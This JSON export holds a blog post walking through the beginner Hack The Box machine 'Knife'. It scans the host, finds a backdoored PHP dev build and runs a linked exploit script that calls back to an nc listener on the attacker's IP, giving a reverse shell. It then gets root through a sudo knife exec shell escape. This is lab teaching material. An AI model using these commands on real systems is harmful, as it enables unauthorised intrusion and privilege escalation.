{"id":163,"date":"2022-07-27T23:15:36","date_gmt":"2022-07-27T23:15:36","guid":{"rendered":"https:\/\/hacking.cool\/?p=163"},"modified":"2024-03-18T05:11:22","modified_gmt":"2024-03-18T05:11:22","slug":"htb-knife-walkthrough","status":"publish","type":"post","link":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","title":{"rendered":"HTB Knife walkthrough"},"content":{"rendered":"\n
\"\"<\/figure>\n\n\n\n

It’s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly.<\/p>\n\n\n\n

We will start from port scanning with nmap:<\/p>\n\n\n\n

nmap -A 10.10.10.242 -Pn <\/strong><\/p>\n\n\n\n

(We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the host.)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Only two ports seem to be open. Let’s check the web site which is running on 80 port!<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

But i wasn’t able to find something interesting here, nothing in page source and no interesting links as well. Also directory enumeration with gobuster had no result \ud83d\ude41 So you can skip this step.<\/p>\n\n\n\n

Now time to check the site with curl:<\/p>\n\n\n\n

curl -I 10.10.10.242<\/strong><\/p>\n\n\n\n

(we use -I option to print the title without the body)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And what we see! Very strange version of php here…Let’s google that.<\/p>\n\n\n\n

We can find out that it is a version of php with a backdoor and use an exploit. I took the following one from github:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

https:\/\/github.com\/flast101\/php-8.1.0-dev-backdoor-rce\/blob\/main\/revshell_php_8.1.0-dev.py<\/a><\/p>\n\n\n\n

So we need to grab a code from this link and put it to the file that we create (I called it shell.py):<\/p>\n\n\n\n

nano shell.py <\/strong><\/p>\n\n\n\n

(I prefer nano, but you can use vi or vim, etc.)<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Then set our listener on 443 port (or you can use different one):<\/p>\n\n\n\n

nc -lnvp 443<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And run our script. Usage: python3 revshell_php_8.1.0-dev.py <target-ip> <attacker-ip> <attacker-port><\/p>\n\n\n\n

python3 shell.py http:\/\/10.10.10.242 10.10.14.16 443<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And… we got a shell \ud83d\ude42<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Flag is waiting for us in user’s home directory:<\/p>\n\n\n\n

cat \/home\/james\/user.txt<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Next we need to find a way how to get root. Try to check which programs our user james can run with root privileges:<\/p>\n\n\n\n

sudo -l<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

And he can run knife! Now moving to the GTFOBins and checking for Knife. And it’s exists here:<\/p>\n\n\n\n

https:\/\/gtfobins.github.io\/gtfobins\/knife\/<\/a><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Let’s copy the command and run it:<\/p>\n\n\n\n

sudo knife exec -E ‘exec “\/bin\/sh”‘<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Very nice, we have root \ud83d\ude09<\/p>\n\n\n\n

Flag in root directory:<\/p>\n\n\n\n

cat \/root\/root.txt<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Thanks for your attention. If you still have any questions write a comment below. <\/p>\n","protected":false},"excerpt":{"rendered":"

It’s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly. We will start from port scanning with nmap: nmap -A 10.10.10.242 -Pn (We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the…<\/span><\/p>\n

Read More<\/a><\/p>\n","protected":false},"author":2,"featured_media":855,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-163","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-walktroughs"],"yoast_head":"\nHTB Knife walkthrough - hacking.cool<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HTB Knife walkthrough - hacking.cool\" \/>\n<meta property=\"og:description\" content=\"It’s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly. We will start from port scanning with nmap: nmap -A 10.10.10.242 -Pn (We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the…Read More\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"hacking.cool\" \/>\n<meta property=\"article:published_time\" content=\"2022-07-27T23:15:36+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-18T05:11:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"1400\" \/>\n\t<meta property=\"og:image:height\" content=\"787\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Anya\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Anya\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#website\",\"url\":\"https:\/\/hacking.cool\/atomanya\/\",\"name\":\"hacking.cool\",\"description\":\"is the hacking school \ud83d\udc69\ud83c\udffb\u200d\ud83d\udcbb\ud83e\uddd1\ud83c\udffb\u200d\ud83d\udcbb\ud83d\uddfa\ud83d\udcda\ud83d\udcd6\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hacking.cool\/atomanya\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage\",\"url\":\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg\",\"contentUrl\":\"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg\",\"width\":1400,\"height\":787},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\",\"url\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\",\"name\":\"HTB Knife walkthrough - hacking.cool\",\"isPartOf\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage\"},\"datePublished\":\"2022-07-27T23:15:36+00:00\",\"dateModified\":\"2024-03-18T05:11:22+00:00\",\"author\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6\"},\"breadcrumb\":{\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hacking.cool\/atomanya\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"HTB Knife walkthrough\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6\",\"name\":\"Anya\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g\",\"caption\":\"Anya\"},\"url\":\"https:\/\/hacking.cool\/atomanya\/author\/anya\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HTB Knife walkthrough - hacking.cool","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"HTB Knife walkthrough - hacking.cool","og_description":"It’s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly. We will start from port scanning with nmap: nmap -A 10.10.10.242 -Pn (We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the…Read More","og_url":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","og_site_name":"hacking.cool","article_published_time":"2022-07-27T23:15:36+00:00","article_modified_time":"2024-03-18T05:11:22+00:00","og_image":[{"width":1400,"height":787,"url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","type":"image\/jpeg"}],"author":"Anya","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Anya","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/hacking.cool\/atomanya\/#website","url":"https:\/\/hacking.cool\/atomanya\/","name":"hacking.cool","description":"is the hacking school \ud83d\udc69\ud83c\udffb\u200d\ud83d\udcbb\ud83e\uddd1\ud83c\udffb\u200d\ud83d\udcbb\ud83d\uddfa\ud83d\udcda\ud83d\udcd6","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hacking.cool\/atomanya\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage","url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","contentUrl":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","width":1400,"height":787},{"@type":"WebPage","@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","url":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/","name":"HTB Knife walkthrough - hacking.cool","isPartOf":{"@id":"https:\/\/hacking.cool\/atomanya\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#primaryimage"},"datePublished":"2022-07-27T23:15:36+00:00","dateModified":"2024-03-18T05:11:22+00:00","author":{"@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6"},"breadcrumb":{"@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/hacking.cool\/atomanya\/htb-knife-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hacking.cool\/atomanya\/"},{"@type":"ListItem","position":2,"name":"HTB Knife walkthrough"}]},{"@type":"Person","@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/1c3060c2c9f3493114afde50f9b22bc6","name":"Anya","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hacking.cool\/atomanya\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e2e99aa0c5e7264f948b910a22231aa9?s=96&d=mm&r=g","caption":"Anya"},"url":"https:\/\/hacking.cool\/atomanya\/author\/anya\/"}]}},"jetpack_featured_media_url":"https:\/\/hacking.cool\/atomanya\/wp-content\/uploads\/2022\/07\/1_njiTGzgqxI8iicqa2Wj74A.jpeg","_links":{"self":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/comments?post=163"}],"version-history":[{"count":52,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/163\/revisions"}],"predecessor-version":[{"id":856,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/posts\/163\/revisions\/856"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/media\/855"}],"wp:attachment":[{"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/media?parent=163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/categories?post=163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacking.cool\/atomanya\/wp-json\/wp\/v2\/tags?post=163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}